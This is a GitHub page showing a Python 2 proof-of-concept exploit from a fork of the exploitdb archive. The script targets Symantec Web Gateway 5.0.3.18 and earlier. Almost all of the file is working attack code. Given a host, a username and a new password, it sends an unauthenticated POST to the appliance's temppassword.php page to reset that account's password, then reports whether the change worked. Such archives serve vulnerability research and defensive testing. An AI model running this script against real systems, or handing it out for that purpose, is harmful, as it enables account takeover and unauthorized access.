forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path20707.py
More file actions
executable file
·43 lines (32 loc) · 1023 Bytes
/
Copy path20707.py
File metadata and controls
executable file
·43 lines (32 loc) · 1023 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/python
import urllib
import urllib2
import re
import sys
print "[*] ###########################################################"
print "[*] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change"
print "[*] @_Kc57"
print "[*] ###########################################################\n"
if (len(sys.argv) != 4):
print "Usage: poc.py <RHOST> <username> <newpassword>"
exit(0)
ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
url = "https://%s/spywall/temppassword.php" % (ip)
opts = {
'target':'executive_summary.php',
'USERNAME':username,
'password':password,
'password2':password,
'Save':'Save'
}
print "[*] Sending request to server..."
data = urllib.urlencode(opts)
request = urllib2.Request(url, data)
response = urllib2.urlopen(request)
match = re.search('Your new password has been saved', response.read())
if(match):
print "[*] Password for %s changed to %s" %(username,password)
else:
print "[*] Password change failed!"